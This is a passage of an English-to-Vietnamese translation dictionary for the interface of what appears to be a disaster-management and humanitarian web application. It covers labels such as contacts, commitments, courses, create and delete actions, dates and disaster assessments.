'Click where you want to open Streetview': 'Bấm vào chỗ bạn muốn xem ở chế độ Đường phố', 'Climate Change Adaptation': 'Thích ứng với Biến đổi khí hậu', 'Climate Change Mitigation': 'Giảm nhẹ Biến đổi khí hậu', 'Climate Change': 'Biến đổi khí hậu', 'Clinical Laboratory': 'Phòng thí nghiệm lâm sàng', 'Close Adjustment': 'Đóng điều chỉnh', 'Close map': 'Đóng bản đồ', 'Close': 'Đóng', 'Closed': 'Đã đóng', 'Closed?': 'Đã Đóng?', 'Cluster Details': 'Thông tin nhóm', 'Cluster Distance': 'Khoảng cách các nhóm', 'Cluster Threshold': 'Ngưỡng của mỗi nhóm', 'Cluster added': 'Nhóm đã được thêm', 'Cluster deleted': 'Nhóm đã được xóa', 'Cluster updated': 'Nhóm đã được cập nhật', 'Cluster': 'Nhóm', 'Cluster(s)': 'Nhóm', 'Clusters': 'Nhóm', 'Code Share': 'Chia sẻ mã', 'Code': 'Mã', 'Cold Wave': 'Đợt lạnh', 'Collect PIN from Twitter': 'Thu thập mã PIN từ Twitter', 'Color of selected Input fields': 'Màu của trường đã được chọn', 'Column Choices (One Per Line': 'Chọn cột', 'Columns': 'Cột', 'Combined Method': 'Phương pháp kết hợp', 'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': 'Quay lại sau. Mọi người ghé thăm trang này đều gặp vấn đề giống bạn.', 'Come back later.': 'Quay lại sau.', 'Comment': 'Ghi chú', 'Comments': 'Ghi chú', 'Commit Date': 'Thời điểm cam kết', 'Commit': 'Cam kết', 'Commit. 
Status': 'Tình trạng cam kết', 'Commitment Added': 'Cam kết đã được thêm', 'Commitment Canceled': 'Cam kết đã được hủy', 'Commitment Details': 'Thông tin của cam kết', 'Commitment Item Details': 'Thông tin mặt hàng cam kết', 'Commitment Item added': 'Mặt hàng cam kết đã được thêm', 'Commitment Item deleted': 'Mặt hàng cam kết đã được xóa', 'Commitment Item updated': 'Mặt hàng cam kết đã được cập nhật', 'Commitment Items': 'Mặt hàng cam kết', 'Commitment Updated': 'Cam kết đã được cập nhật', 'Commitment': 'Cam kết', 'Commitments': 'Cam kết', 'Committed By': 'Cam kết bởi', 'Committed People': 'Người đã Cam kết', 'Committed Person Details': 'Thông tin người đã cam kết', 'Committed Person updated': 'Người cam kết đã được cập nhật', 'Committed': 'Đã Cam kết', 'Committing Organization': 'Tổ chức cam kết', 'Committing Person': 'Người đang cam kết', 'Committing Warehouse': 'Kho hàng đang cam kết', 'Commodities Loaded': 'Hàng hóa được đưa lên xe', 'Commune Name': 'Tên xã', 'Commune': 'Phường/ Xã', 'Communicable Diseases': 'Bệnh dịch lây truyền', 'Communities': 'Địa bàn dự án', 'Community Action Planning': 'Lập kế hoạch hành động của cộng đồng', 'Community Added': 'Cộng đồng đã được thêm', 'Community Contacts': 'Thông tin liên hệ của cộng đồng', 'Community Deleted': 'Cộng đồng đã được xóa', 'Community Details': 'Thông tin về cộng đồng', 'Community Health Center': 'Trung tâm sức khỏe cộng đồng', #'Community Health': 'Chăm sóc sức khỏe cộng đồng', 'Community Member': 'Thành viên cộng đồng', 'Community Mobilisation': 'Huy động cộng đồng', 'Community Mobilization': 'Huy động cộng đồng', 'Community Organisation': 'Tổ chức cộng đồng', 'Community Organization': 'Tổ chức cộng đồng', 'Community Updated': 'Cộng đồng đã được cập nhật', 'Community Health': 'CSSK Cộng đồng', 'Community': 'Cộng đồng', 'Community-based DRR': 'GTRRTH dựa vào cộng đồng', 'Company': 'Công ty', 'Competency Rating Catalog': 'Danh mục xếp hạng năng lực', 'Competency Rating Details': 'Thông tin xếp hạng năng lực', 'Competency Rating added': 'Xếp hạng năng lực đã được thêm', 'Competency Rating deleted': 'Xếp hạng năng lực đã được xóa', 'Competency Rating updated': 'Xếp hạng năng lực đã được cập nhật', 'Competency Rating': 'Xếp hạng năng lực', 'Competency': 'Cấp độ thành thục', 'Complete Returns': 'Hoàn tất trả hàng', 'Complete Unit Label for e.g. meter for m.': 'Nhãn đơn vị đầy đủ. 
Ví dụ mét cho m.', 'Complete': 'Hoàn thành', 'Completed Assessment Form Details': 'Thông tin biểu mẫu đánh giá đã hoàn thiện', 'Completed Assessment Form deleted': 'Biểu mẫu đánh giá đã hoàn thiện đã được xóa', 'Completed Assessment Form entered': 'Biểu mẫu đánh giá đã hoàn thiện đã được nhập', 'Completed Assessment Form updated': 'Biểu mẫu đánh giá đã hoàn thiện đã được cập nhật', 'Completed Assessment Forms': 'Biểu mẫu đánh giá đã hoàn thiện', 'Completed Assessments': 'Các Đánh giá đã Hoàn thành', 'Completed': 'Hoàn thành', 'Completion Question': 'Câu hỏi hoàn thành', 'Complex Emergency': 'Tình huống khẩn cấp phức tạp', 'Complexion': 'Nước da', 'Compose': 'Soạn thảo', 'Condition': 'Điều kiện', 'Conduct a Disaster Assessment': 'Thực hiện đánh giá thảm họa', 'Config added': 'Cấu hình đã được thêm', 'Config updated': 'Cập nhật tùy chỉnh', 'Config': 'Tùy chỉnh', 'Configs': 'Cấu hình', 'Configuration': 'Cấu hình', 'Configure Layer for this Symbology': 'Thiết lập cấu hình lớp cho biểu tượng này', 'Configure Run-time Settings': 'Thiết lập cấu hình cho cài đặt thời gian hoạt động', 'Configure connection details and authentication': 'Thiết lập cấu hình cho thông tin kết nối và xác thực', 'Configure resources to synchronize, update methods and policies': 'Cài đặt cấu hình các nguồn lực để đồng bộ, cập nhật phương pháp và chính sách', 'Configure the default proxy server to connect to remote repositories': 'Thiết lập cấu hình cho máy chủ mặc định để kết nối tới khu vực lưu trữ từ xa', 'Configure/Monitor Synchonization': 'Thiết lập cấu hình/ giám sát đồng bộ hóa', 'Confirm Shipment Received': 'Xác nhận lô hàng đã nhận', 'Confirm that some items were returned from a delivery to beneficiaries and they will be accepted back into stock.': 'Xác nhận một số mặt hàng đã được trả lại từ bên vận chuyển tới người hưởng lợi và các mặt hàng này sẽ được chấp thuân nhập trở lại kho.', 'Confirm that the shipment has been received by a destination which will not record the shipment directly into the system and confirmed as received.': 'Xác nhận lô hàng đã nhận đến điểm gửi mà không biên nhập lô hàng trực tiếp vào hệ thống và đã xác nhận việc nhận hàng', 'Confirmed': 'Đã xác nhận', 'Confirming Organization': 'Tổ chức xác nhận', 'Conflict Policy': 'Chính sách xung đột', 'Construction of Transitional Shelter': 'Xây dựng nhà tạm', 'Consumable': 'Có thể tiêu dùng được', 'Contact Added': 'Thông tin liên hệ đã được thêm', 'Contact Data': 'Dữ liệu thông tin liên hệ', 'Contact Deleted': 'Thông tin liên hệ đã được xóa', 'Contact Details': 'Chi tiết liên hệ', 'Contact Info': 'Thông tin liên hệ', 'Contact Information Added': 'Thông tin liên hệ đã được thêm', 'Contact Information Deleted': 'Thông tin liên hệ đã được xóa', 'Contact Information Updated': 'Thông tin liên hệ đã được cập nhật', 'Contact Information': 'Thông tin liên hệ', 'Contact Method': 'Phương pháp liên hệ', 'Contact People': 'Người liên hệ', 'Contact Person': 'Người liên hệ', 'Contact Persons': 'Người liên hệ', 'Contact Updated': 'Thông tin liên hệ đã được cập nhật', 'Contact us': 'Liên hệ chúng tôi', 'Contact': 'Thông tin liên hệ', 'Contacts': 'Thông tin liên hệ', 'Contents': 'Nội dung', 'Context': 'Bối cảnh', 'Contingency/ Preparedness Planning': 'Lập kế hoạch dự phòng/ phòng ngừa', 'Contract End Date': 'Ngày kết thúc hợp đồng', 'Contributor': 'Người đóng góp', 'Controller': 'Người kiểm soát', 'Conversion Tool': 'Công cụ chuyển đổi', 'Coordinate Layer': 'Lớp điều phối', 'Coordination and Partnerships': 'Điều phối và Hợp tác', 'Copy': 'Sao chép', 'Corn': 
'Ngô', 'Corporate Entity': 'Thực thể công ty', 'Could not add person record': 'Không thêm được hồ sơ cá nhân', 'Could not auto-register at the repository, please register manually.': 'Không thể đăng ký tự động vào kho dữ liệu, đề nghị đăng ký thủ công', 'Could not create record.': 'Không tạo được hồ sơ', 'Could not generate report': 'Không tạo được báo cáo', 'Could not initiate manual synchronization.': 'Không thể bắt đầu việc đồng bộ hóa thủ công', 'Count of Question': 'Số lượng câu hỏi', 'Count': 'Số lượng', 'Countries': 'Quốc gia', 'Country Code': 'Mã quốc gia', 'Country in': 'Quốc gia ở', 'Country is required!': 'Quốc gia bắt buộc điền!', 'Country': 'Quốc gia', 'County / District (Count)': 'Quận / Huyện (số lượng)', 'County / District': 'Quận/ Huyện', 'Course Catalog': 'Danh mục khóa tập huấn', 'Course Certificate Details': 'Thông tin chứng nhận khóa tập huấn', 'Course Certificate added': 'Chứng nhận khóa tập huấn đã được thêm', 'Course Certificate deleted': 'Chứng nhận khóa tập huấn đã được xóa', 'Course Certificate updated': 'Chứng nhận khóa tập huấn đã được cập nhật', 'Course Certificates': 'Chứng chỉ khóa học', 'Course Details': 'Thông tin khóa tập huấn', 'Course added': 'Khóa tập huấn đã được thêm', 'Course deleted': 'Khóa tập huấn đã được xóa', 'Course updated': 'Khóa tập huấn đã được cập nhật', 'Course': 'Khóa tập huấn', 'Create & manage Distribution groups to receive Alerts': 'Tạo & quản lý nhóm phân phát để nhận cảnh báo', 'Create Activity Type': 'Thêm loại hình hoạt động', 'Create Activity': 'Thêm hoạt động', 'Create Assessment Template': 'Thêm biểu mẫu đánh giá', 'Create Assessment': 'Thêm đợt đánh giá', 'Create Asset': 'Thêm tài sản', 'Create Award': 'Thêm khen thưởng', 'Create Award Type': 'Thêm hình thức khen thưởng', 'Create Beneficiary Type': 'Thêm loại người hưởng lợi', 'Create Brand': 'Thêm nhãn hàng', 'Create Catalog Item': 'Thêm mặt hàng vào danh mục', 'Create Catalog': 'Thêm danh mục', 'Create Certificate': 'Thêm chứng nhận', 'Create Cluster': 'Thêm nhóm', 'Create Community': 'Thêm cộng đồng', 'Create Competency Rating': 'Thêm xếp loại năng lực', 'Create Contact': 'Thêm liên lạc', 'Create Course': 'Thêm khóa tập huấn', 'Create Department': 'Thêm phòng/ban', 'Create Disaster Assessment': 'Thêm báo cáo đánh giá thảm họa', 'Create Facility Type': 'Thêm loại hình bộ phận', 'Create Facility': 'Thêm bộ phận', 'Create Feature Layer': 'Thêm lớp chức năng', 'Create Group Entry': 'Tạo ghi chép nhóm', 'Create Group': 'Thêm nhóm', 'Create Hazard': 'Thêm hiểm họa', 'Create Hospital': 'Thêm Bệnh viện', 'Create Incident Report': 'Thêm báo cáo sự cố', 'Create Incident': 'Thêm sự kiện', 'Create Item Category': 'Thêm loại hàng hóa', 'Create Item Pack': 'Thêm gói hàng hóa', #'Create Item': 'Tạo mặt hàng mới', 'Create Item': 'Thêm hàng hóa', 'Create Job Title': 'Thêm chức danh công việc', 'Create Job': 'Thêm công việc', 'Create Kit': 'Thêm dụng cụ', 'Create Layer': 'Thêm lớp', 'Create Location Hierarchy': 'Thêm thứ tự địa điểm', 'Create Location': 'Thêm địa điểm', 'Create Mailing List': 'Thêm danh sách gửi thư', 'Create Map Profile': 'Thêm cài đặt cấu hình bản đồ', 'Create Marker': 'Thêm công cụ đánh dấu', 'Create Member': 'Thêm hội viên', 'Create Membership Type': 'Thêm loại hội viên', 'Create Milestone': 'Thêm mốc quan trọng', 'Create National Society': 'Thêm Hội Quốc gia', 'Create Office Type': 'Thêm loại hình văn phòng mới', 'Create Office': 'Thêm văn phòng', 'Create Organization Type': 'Thêm loại hình tổ chức', 'Create Organization': 'Thêm tổ chức', 'Create PDF': 'Tạo PDF', 
'Create Partner Organization': 'Thêm tổ chức đối tác', 'Create Program': 'Thêm chương trình', 'Create Project': 'Thêm dự án', 'Create Projection': 'Thêm phép chiếu', 'Create Question Meta-Data': 'Thêm siêu dữ liệu câu hỏi', 'Create Report': 'Thêm báo cáo mới', 'Create Repository': 'Thêm kho chứa', 'Create Request': 'Khởi tạo yêu cầu', 'Create Resource': 'Thêm nguồn lực', 'Create Role': 'Thêm vai trò', 'Create Room': 'Thêm phòng', 'Create Sector': 'Thêm lĩnh vực', 'Create Shelter': 'Thêm Nơi cư trú mới', 'Create Skill Type': 'Thêm loại kỹ năng', 'Create Skill': 'Thêm kỹ năng', 'Create Staff Member': 'Thêm cán bộ', 'Create Status': 'Thêm trạng thái', 'Create Supplier': 'Thêm nhà cung cấp', 'Create Symbology': 'Thêm biểu tượng', 'Create Task': 'Thêm nhiệm vụ', 'Create Team': 'Tạo đội TNV', 'Create Theme': 'Thêm chủ đề', 'Create Training Event': 'Thêm khóa tập huấn', 'Create User': 'Thêm người dùng', 'Create Volunteer Cluster Position': 'Thêm vị trí của nhóm tình nguyện viên', 'Create Volunteer Cluster Type': 'Thêm loại hình nhóm tình nguyện viên', 'Create Volunteer Cluster': 'Thêm nhóm tình nguyện viên', 'Create Volunteer Role': 'Thêm vai trò của tình nguyện viên', 'Create Volunteer': 'Thêm tình nguyện viên', 'Create Warehouse': 'Thêm kho hàng', 'Create a Person': 'Thêm họ tên', 'Create a group entry in the registry.': 'Tạo ghi chép nhóm trong hồ sơ đăng ký', 'Create a new Team': 'Tạo đội TNV mới', 'Create a new facility or ensure that you have permissions for an existing facility.': 'Tạo tiện ích mới hoặc đảm bảo rằng bạn có quyền truy cập vào tiện ích sẵn có', 'Create a new organization or ensure that you have permissions for an existing organization.': 'Tạo tổ chức mới hoặc đảm bảo rằng bạn có quyền truy cập vào một tổ chức có sẵn', 'Create alert': 'Tạo cảnh báo', 'Create an Assessment Question': 'Thêm câu hỏi trong mẫu đánh giá', 'Create search': 'Thêm tìm kiếm', 'Create template': 'Tạo mẫu biểu', 'Create': 'Thêm', 'Created By': 'Tạo bởi', 'Created by': 'Tạo bởi', 'Credential Details': 'Thông tin thư ủy nhiệm', 'Credential added': 'Thư ủy nhiệm đã được thêm', 'Credential deleted': 'Thư ủy nhiệm đã được xóa', 'Credential updated': 'Thư ủy nhiệm đã được cập nhật', 'Credentialling Organization': 'Tổ chức ủy nhiệm', 'Credentials': 'Thư ủy nhiệm', 'Crime': 'Tội phạm', 'Criteria': 'Tiêu chí', 'Critical Infrastructure': 'Cở sở hạ tầng trọng yếu', 'Currency': 'Tiền tệ', 'Current Group Members': 'Nhóm thành viên hiện tại', 'Current Home Address': 'Địa chỉ nhà riêng hiện tại', 'Current Identities': 'Nhận dạng hiện tại', 'Current Location': 'Vị trí hiện tại', 'Current Memberships': 'Thành viên hiện tại', 'Current Owned By (Organization/Branch)': 'Hiện tại đang được sở hữu bởi (Tổ chức/ cơ sở)', 'Current Status': 'Trạng thái hiện tại', 'Current Twitter account': 'Tài khoản Twitter hiện tại', 'Current request': 'Yêu cầu hiện tại', 'Current response': 'Hoạt động ứng phó hiện tại', 'Current session': 'Phiên làm việc hiện tại', 'Current': 'Hiện tại', 'Currently no Certifications registered': 'Hiện tại chưa có chứng nhận nào được đăng ký', 'Currently no Course Certificates registered': 'Hiện tại chưa có chứng nhận khóa tập huấn nào được đăng ký', 'Currently no Credentials registered': 'Hiện tại chưa có thư ủy nhiệm nào được đăng ký', 'Currently no Participants registered': 'Hiện tại chưa có người tham dự nào đăng ký', 'Currently no Professional Experience entered': 'Hiện tại chưa có kinh nghiệm nghề nghiệp nào được nhập', 'Currently no Skill Equivalences registered': 'Hiện tại chưa có kỹ năng tương đương nào 
được đăng ký', 'Currently no Skills registered': 'Hiện tại chưa có kỹ năng nào được đăng ký', 'Currently no Trainings registered': 'Hiện tại chưa có khóa tập huấn nào được đăng ký', 'Currently no entries in the catalog': 'Hiện chưa có hồ sơ nào trong danh mục', 'Currently no hours recorded for this volunteer': 'Hiện tại chưa có thời gian hoạt động được ghi cho tình nguyện viên này', 'Currently no programmes registered': 'Hiện tại chưa có chương trình nào được đăng ký', 'Currently no staff assigned': 'Hiện tại chưa có cán bộ nào được phân công', 'Currently no training events registered': 'Hiện tại chưa có khóa tập huấn nào được đăng ký', 'Customer': 'Khách hàng', 'Customisable category of aid': 'Các tiêu chí cứu trợ có thể tùy chỉnh', 'Cyclone': 'Bão', 'DATA QUALITY': 'CHẤT LƯỢNG DỮ LIỆU', 'DATA/REPORT': 'DỮ LIỆU/BÁO CÁO', 'DECIMAL_SEPARATOR': 'Ngăn cách bằng dấu phẩy', 'DELETE': 'XÓA', 'DRR': 'GTRRTH', 'DRRPP Extensions': 'Phần mở rộng DRRPP', 'Daily Work': 'Công việc hàng ngày', 'Daily': 'Hàng ngày', 'Dam Overflow': 'Tràn đập', 'Damaged': 'Bị hư hại', 'Dangerous Person': 'Người nguy hiểm', 'Dashboard': 'Bảng điều khiển', 'Data Quality': 'Chất lượng Dữ liệu', 'Data Source': 'Nguồn Dữ liệu', 'Data Type': 'Loại dữ liệu', 'Data added to Theme Layer': 'Dữ liệu đã được thêm vào lớp chủ đề', 'Data import error': 'Lỗi nhập dữ liệu', 'Data uploaded': 'Dữ liệu đã được tải lên', 'Data': 'Dữ liệu', 'Data/Reports': 'Dữ liệu/Báo cáo', 'Database Development': 'Xây dựng cơ sở dữ liệu', 'Database': 'Cơ sở Dữ liệu', 'Date Available': 'Ngày rảnh rỗi', 'Date Created': 'Ngày đã được tạo', 'Date Due': 'Ngày đến hạn', 'Date Expected': 'Ngày dự kiến', 'Date Joined': 'Ngày tham gia', 'Date Needed By': 'Cần trước ngày', 'Date Published': 'Ngày xuất bản', 'Date Question': 'Hỏi Ngày', 'Date Range': 'Khoảng thời gian', 'Date Received': 'Ngày Nhận được', 'Date Released': 'Ngày Xuất ra', 'Date Repacked': 'Ngày Đóng gói lại', 'Date Requested': 'Ngày Đề nghị', 'Date Required Until': 'Yêu cầu trước ngày', 'Date Required': 'Ngày yêu cầu', 'Date Sent': 'Ngày gửi', 'Date Taken': 'Ngày Nhận được', 'Date Until': 'Trước Ngày', 'Date and Time of Goods receipt. 
By default shows the current time but can be modified by editing in the drop down list.': 'Ngày giờ nhận hàng hóa. Hiển thị thời gian theo mặc định nhưng vẫn có thể chỉnh sửa', 'Date and Time': 'Ngày và giờ', 'Date must be %(max)s or earlier!': 'Ngày phải %(max)s hoặc sớm hơn!', 'Date must be %(min)s or later!': 'Ngày phải %(min)s hoặc muộn hơn!', 'Date must be between %(min)s and %(max)s!': 'Ngày phải trong khoản %(min)s và %(max)s!', 'Date of Birth': 'Ngày Sinh', 'Date of Report': 'Ngày báo cáo', 'Date of adjustment': 'Điều chỉnh ngày', 'Date of submission': 'Ngày nộp', 'Date resigned': 'Ngày từ nhiệm', 'Date': 'Ngày', 'Date/Time of Alert': 'Ngày/Giờ Cảnh báo', 'Date/Time of Dispatch': 'Ngày/Giờ Gửi', 'Date/Time of Find': 'Ngày giờ tìm kiếm', 'Date/Time': 'Ngày/Giờ', 'Day': 'Ngày', 'De-duplicator': 'Bộ chống trùng', 'Dead Bodies': 'Các xác chết', 'Dead Body Reports': 'Báo cáo thiệt hại về người', 'Dead Body': 'Xác chết', 'Deaths/24hrs': 'Số người chết/24h', 'Deceased': 'Đã chết', 'Decimal Degrees': 'Độ thập phân', 'Decision': 'Quyết định', 'Decline failed': 'Từ chối không thành công', 'Default Base layer?': 'Lớp bản đồ cơ sở mặc định?', 'Default Location': 'Địa điểm mặc định', 'Default Marker': 'Đánh dấu mặc định', 'Default Realm = All Entities the User is a Staff Member of': 'Realm mặc định=tất cả các đơn vị, người Sử dụng là cán bộ thành viên của', 'Default Realm': 'Realm mặc định', 'Default map question': 'Câu hỏi bản đồ mặc định', 'Default synchronization policy': 'Chính sách đồng bộ hóa mặc định', 'Default': 'Mặc định', 'Defaults': 'Mặc định', 'Defines the icon used for display of features on handheld GPS.': 'Định nghĩa biểu tượng được sử dụng để miêu tả các chức năng trên máy GPS cầm tay.', 'Defines the icon used for display of features on interactive map & KML exports.': 'Định nghĩa biểu tượng được sử dụng để miêu tả các chức năng trên bản đồ tương tác và chiết xuất KML.', 'Degrees in a latitude must be between -90 to 90.': 'Giá trị vĩ độ phải trong khoảng -90 tới 90', 'Degrees in a longitude must be between -180 to 180.': 'Giá trị kinh độ phải nằm giữa -180 tới 180', 'Degrees must be a number.': 'Độ: phải hiển thị bằng số', 'Delete Affiliation': 'Xóa liên kết', 'Delete Aid Request': 'Xóa yêu cầu cứu trợ', 'Delete Alternative Item': 'Xóa mặt hàng thay thế', 'Delete Asset Log Entry': 'Xóa ghi chép nhật ký tài sản', 'Delete Asset': 'Xóa tài sản', 'Delete Branch': 'Xóa tổ chức cơ sở', 'Delete Brand': 'Xóa nhãn hiệu', 'Delete Budget': 'Xóa ngân sách', 'Delete Catalog Item': 'Xóa mặt hàng trong danh mục', 'Delete Catalog': 'Xóa danh mục', 'Delete Certificate': 'Xóa chứng chỉ', 'Delete Certification': 'Xóa bằng cấp', 'Delete Cluster': 'Xóa nhóm', 'Delete Commitment Item': 'Xóa mặt hàng cam kết', 'Delete Commitment': 'Xóa cam kết', 'Delete Competency Rating': 'Xóa xếp loại năng lực', 'Delete Config': 'Xóa cấu hình', 'Delete Contact Information': 'Xóa thông tin liên hệ', 'Delete Course Certificate': 'Xóa chứng chỉ khóa học', 'Delete Course': 'Xóa khóa học', 'Delete Credential': 'Xóa thư ủy nhiệm', 'Delete Data from Theme layer': 'Xóa dữ liệu khỏi lớp chủ đề', 'Delete Department': 'Xóa phòng/ban', 'Delete Document': 'Xóa tài liệu', 'Delete Donor': 'Xóa nhà tài trợ', 'Delete Facility Type': 'Xóa loại hinh bộ phận', 'Delete Facility': 'Xóa bộ phận', 'Delete Feature Layer': 'Xóa lớp chức năng', 'Delete Group': 'Xóa nhóm', 'Delete Hazard': 'Xóa hiểm họa', 'Delete Hospital': 'Xóa Bệnh viện', 'Delete Hours': 'Xóa thời gian hoạt động', 'Delete Image': 'Xóa hình ảnh', 'Delete Incident Report': 'Xóa 
báo cáo sự cố', 'Delete Inventory Store': 'Xóa kho lưu trữ', 'Delete Item Category': 'Xóa danh mục hàng hóa', 'Delete Item Pack': 'Xóa gói hàng', 'Delete Item from Request': 'Xóa mặt hàng từ yêu cầu', 'Delete Item': 'Xóa mặt hàng', 'Delete Job Role': 'Xóa vai trò công việc', 'Delete Job Title': 'Xóa chức danh', 'Delete Kit': 'Xóa dụng cụ', 'Delete Layer': 'Xóa lớp', 'Delete Location Hierarchy': 'Xóa thứ tự địa điểm', 'Delete Location': 'Xóa địa điểm', 'Delete Mailing List': 'Xóa danh sách gửi thư', 'Delete Map Profile': 'Xóa cài đặt cấu hình bản đồ', 'Delete Marker': 'Xóa công cụ đánh dấu', 'Delete Member': 'Xóa hội viên', 'Delete Membership Type': 'Xóa loại hình nhóm hội viên', 'Delete Membership': 'Xóa nhóm hội viên', 'Delete Message': 'Xóa tin nhắn', 'Delete Metadata': 'Xóa siêu dữ liệu', 'Delete National Society': 'Xóa Hội Quốc gia', 'Delete Office Type': 'Xóa loại hình văn phòng', 'Delete Office': 'Xóa văn phòng', 'Delete Order': 'Xóa đơn đặt hàng', 'Delete Organization Domain': 'Xóa lĩnh vực hoạt động của tổ chức', 'Delete Organization Type': 'Xóa loại hình tổ chức', 'Delete Organization': 'Xóa tổ chức', 'Delete Participant': 'Xóa người tham dự', 'Delete Partner Organization': 'Xóa tổ chức đối tác', 'Delete Person': 'Xóa đối tượng', 'Delete Photo': 'Xóa ảnh', 'Delete Professional Experience': 'Xóa kinh nghiệm nghề nghiệp', 'Delete Program': 'Xóa chương trình', 'Delete Project': 'Xóa dự án', 'Delete Projection': 'Xóa phép chiếu', 'Delete Received Shipment': 'Xóa lô hàng đã nhận', 'Delete Record': 'Xóa hồ sơ', 'Delete Report': 'Xóa báo cáo', 'Delete Request Item': 'Xóa yêu cầu hàng hóa', 'Delete Request': 'Xóa yêu cầu', 'Delete Role': 'Xóa vai trò', 'Delete Room': 'Xóa phòng', 'Delete Sector': 'Xóa lĩnh vực', 'Delete Sent Shipment': 'Xóa lô hàng đã gửi', 'Delete Service Profile': 'Xóa hồ sơ đăng ký dịch vụ', 'Delete Shipment Item': 'Xóa mặt hàng trong lô hàng', 'Delete Skill Equivalence': 'Xóa kỹ năng tương đương', 'Delete Skill Type': 'Xóa loại kỹ năng', 'Delete Skill': 'Xóa kỹ năng', 'Delete Staff Assignment': 'Xóa phân công cho cán bộ', 'Delete Staff Member': 'Xóa cán bộ', 'Delete Status': 'Xóa tình trạng', 'Delete Stock Adjustment': 'Xóa điều chỉnh hàng lưu kho', 'Delete Supplier': 'Xóa nhà cung cấp', 'Delete Survey Question': 'Xóa câu hỏi khảo sát', 'Delete Survey Template': 'Xóa mẫu khảo sát', 'Delete Symbology': 'Xóa biểu tượng', 'Delete Theme': 'Xóa chủ đề', 'Delete Training Event': 'Xóa sự kiện tập huấn', 'Delete Training': 'Xóa tập huấn', 'Delete Unit': 'Xóa đơn vị', 'Delete User': 'Xóa người dùng', 'Delete Volunteer Cluster Position': 'Xóa vị trí nhóm tình nguyện viên', 'Delete Volunteer Cluster Type': 'Xóa loại hình nhóm tình nguyện viên', 'Delete Volunteer Cluster': 'Xóa nhóm tình nguyện viên', 'Delete Volunteer Role': 'Xóa vai trò của tình nguyện viên', 'Delete Volunteer': 'Xóa tình nguyện viên', 'Delete Warehouse': 'Xóa kho hàng', 'Delete all data of this type which the user has permission to before upload. This is designed for workflows where the data is maintained in an offline spreadsheet and uploaded just for Reads.': 'Xóa tất cả dữ liệu loại này mà người dùng có quyền truy cập trước khi tải lên. 
Việc này được thiết kế cho chu trình làm việc mà dữ liệu được quản lý trên excel ngoại tuyến và được tải lên chỉ để đọc.', 'Delete from Server?': 'Xóa khỏi máy chủ?', 'Delete saved search': 'Xóa tìm kiếm đã lưu', 'Delete this Assessment Answer': 'Xóa câu trả lời này trong mẫu đánh giá', 'Delete this Assessment Question': 'Xóa câu hỏi này trong mẫu đánh giá', 'Delete this Assessment Template': 'Xóa biểu mẫu đánh giá này', 'Delete this Completed Assessment Form': 'Xóa biểu mẫu đánh giá đã được hoàn thiện này', 'Delete this Disaster Assessment': 'Xóa đánh giá thảm họa này', 'Delete this Question Meta-Data': 'Xóa siêu dữ liệu câu hỏi này', 'Delete this Template Section': 'Xóa nội dung này trong biểu mẫu', 'Delete': 'Xóa', 'Deliver To': 'Gửi tới', 'Delivered By': 'Được giao bởi', 'Delivered To': 'Đã gửi tới', 'Demographic Data Details': 'Thông tin số liệu dân số', 'Demographic Data added': 'Số liệu dân số đã được thêm', 'Demographic Data deleted': 'Số liệu dân số đã được xóa', 'Demographic Data updated': 'Số liệu dân số đã được cập nhật', 'Demographic Data': 'Số liệu dân số', 'Demographic Details': 'Thông tin dân số', 'Demographic Source Details': 'Thông tin về nguồn dữ liệu dân số', 'Demographic Sources': 'Nguồn dữ liệu dân số', 'Demographic added': 'Dữ liệu nhân khẩu đã được thêm', 'Demographic data': 'Số liệu dân số', 'Demographic deleted': 'Dữ liệu nhân khẩu đã được xóa', 'Demographic source added': 'Nguồn số liệu dân số đã được thêm', 'Demographic source deleted': 'Nguồn số liệu dân số đã được xóa', 'Demographic source updated': 'Nguồn số liệu dân số đã được cập nhật', 'Demographic updated': 'Dữ liệu nhân khẩu đã được cập nhật', 'Demographic': 'Nhân khẩu', 'Demographics': 'Nhân khẩu', 'Demonstrations': 'Trình diễn', 'Dental Examination': 'Khám nha khoa', 'Dental Profile': 'Hồ sơ khám răng', 'Department / Unit': 'Ban / Đơn vị', 'Department Catalog': 'Danh sách phòng/ban', 'Department Details': 'Thông tin phòng/ban', 'Department added': 'Phòng ban đã được thêm', 'Department deleted': 'Phòng ban đã được xóa', 'Department updated': 'Phòng ban đã được cập nhật', 'Deployment Location': 'Địa điểm điều động', 'Deployment Request': 'Yêu cầu điều động', 'Deployment': 'Triển khai', 'Describe the condition of the roads to your hospital.': 'Mô tả tình trạng các con đường tới bệnh viện.', "Describe the procedure which this record relates to (e.g. 
'medical examination')": 'Mô tả qui trình liên quan tới hồ sơ này (ví dụ: "kiểm tra sức khỏe")', 'Description of Contacts': 'Mô tả thông tin mối liên lạc', 'Description of defecation area': 'Mô tả khu vực đại tiện', 'Description': 'Mô tả', 'Design, deploy & analyze surveys.': 'Thiết kế, triển khai và phân tích đánh giá.', 'Destination': 'Điểm đến', 'Destroyed': 'Bị phá hủy', 'Detailed Description/URL': 'Mô tả chi tiết/URL', 'Details field is required!': 'Ô Thông tin chi tiết là bắt buộc!', 'Details of Disaster Assessment': 'Thông tin chi tiết về đánh giá thảm họa', 'Details of each question in the Template': 'Chi tiết về mỗi câu hỏi trong biểu mẫu', 'Details': 'Chi tiết', 'Dignitary Visit': 'Chuyến thăm cấp cao', 'Direction': 'Định hướng', 'Disable': 'Vô hiệu', 'Disabled': 'Đã tắt', 'Disaster Assessment Chart': 'Biểu đồ đánh giá thảm họa', 'Disaster Assessment Map': 'Bản đồ đánh giá thảm họa', 'Disaster Assessment Summary': 'Tóm tắt đánh giá thảm họa', 'Disaster Assessment added': 'Báo cáo đánh giá thảm họa đã được thêm', 'Disaster Assessment deleted': 'Báo cáo đánh giá thảm họa đã được xóa', 'Disaster Assessment updated': 'Báo cáo đánh giá thảm họa đã được cập nhật', 'Disaster Assessments': 'Đánh giá thảm họa', 'Disaster Law': 'Luật phòng, chống thiên tai', 'Disaster Risk Management': 'QLRRTH', 'Disaster Risk Reduction': 'GTRRTH', 'Disaster Victim Identification': 'Nhận dạng nạn nhân trong thảm họa', 'Disaster chemical spill/leak, explosions, collapses, gas leaks, urban fire, oil spill, technical failure': 'Rò rỉ/tràn hóa chất, nổ, sập đổ, rò khí ga, hỏa hoạn đô thị, tràn dầu, sự cố kỹ thuật', 'Disciplinary Action Type': 'Hình thức kỷ luật', 'Disciplinary Body': 'Cấp kỷ luật', 'Disciplinary Record': 'Kỷ luật', 'Discussion Forum': 'Diễn đàn thảo luận', 'Dispatch Time': 'Thời gian gửi đi', 'Dispatch': 'Gửi đi', 'Dispensary': 'Y tế dự phòng', 'Displaced Populations': 'Dân cư 